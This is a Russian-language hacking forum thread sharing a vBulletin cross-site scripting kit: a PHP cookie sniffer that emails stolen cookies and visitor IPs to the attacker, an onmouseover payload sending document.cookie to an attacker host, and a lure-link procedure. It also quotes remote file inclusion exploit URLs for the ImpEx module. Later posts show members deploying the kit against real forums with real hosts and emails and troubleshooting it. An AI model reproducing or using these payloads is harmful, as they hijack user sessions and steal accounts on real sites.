работает отлично! ;)

( 1 )

--------------------------------------------------------------------

Name file: exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>



--------------------------------------------------------------------

<?php
$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------


( 2 )

--------------------------------------------------------------------

Name file: image.gif

--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------


( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1° new thread
2° <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3° Submit
4° It waits for

--------------------------------------------------------------------

Видимо, работает только при разрешённых html тэгах.
ИМХО - лажа

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?


video нужнa ?

liauliau - давай сними им видео а то до них это всё плохо доходит...

слушай реально сними видео.=)

слушай реально сними видео.=)

ok ;) 1min

чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

сплойт гавно

короткое video тут (http://svr77.ehostpros.com/~yourse77/hack_video/vb.rar)

Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
Remote File Inclusion in VBulletin ImpEx
Date :
12 / 4 / 2006
Software :
VBulletin ImpEx
version :

VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug reside in :

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit :

(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
Discovery by :
Dr.Jr7
GreeTz :
special greet to Qptan & Mr.SNAKE & trooq
and to my all frinds in www.lezr.com/vb
see u :}

Impex это модуль вроде бы?

Impex это модуль вроде бы?Похоже что да, ибо довольно часто натыкаюсь на 404.

а ниукого хотябы досера нету?
чтобы прокси обращались к поиску, а главное был бы sql запрос
и тогда у жертвы (в моем случае)повиснит форум т.к ограничено 20.000 запросами к БД

Видео посмотрел там Xss просто.

А можно,это просто в новое сообщение в форуме вставить?
Там ХТМЛ разрешен

подскажите есть что нибудь под эту версию ??
p.s : тема ниже не работает

Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
И залить сплоит к себе ,так???

Я должен на форуме в сообщении написать это <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
И залить сплоит к себе ,так???


Видео смотрел ???

http://forum.antichat.ru/thread17968.html

тема работает ;)

html код выключен

Говно! хтмл практически у всех отключен! А Ipmex сплоит тож гавно, импех тока когда с движка форума каковонить пережаешь на воблу, потом этот скрипт все удаляют!

да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
На форуме хтмл код включен.Что можно сделать?
В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил

ГЫгы, это спотря какой снифер у тебя

Снифер из той же статья,настройка там всего одна,адрес почты

да,видео смотрел.НО там автор пишет этот код в подпись,а в моем случае подпись запрещена.
На форуме хтмл код включен.Что можно сделать?
В видео автор вставляет этот код <pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >,и ему на почту приходят куки,НО у меня он не срабатывает,ничего не шлет,хотя сплоит я настроил

дай адрес форумa - лп

liauliau-наисал в ЛП

liauliau-наисал в ЛП


HTML код Выкл. :mad:

да включен там код хтмл,но не для всех,а толко для определеных групп...
Подскажи почему на сниф ничего неприходит?

Вот посмотри что неправильно в моих дейсивиях
1-Залил на сайт эксплоит с такими данными
<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "shport-maksim@yandex.ru";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
2-на форуме просто в новом сообщении написал вот это
<pre a='>' onmouseover='document.location="http://coolmoto.jino-net.ru/downloads/exploit.php?c="+document.cookie' b='</pre' >
Что не ТАК?

liauliau-помоги пожалуйста.
У тебя есть аська?

liauliau-помоги пожалуйста.
У тебя есть аська?

не знаю что ты там делаешь ? дай форум где включен код хтмл я тебе зделаю видео ;)

liauliau-короче,вроде сработал,но в письме в поле куки ничего небыло

Видео > тут (http://www.sendspace.com/file/2reoe8)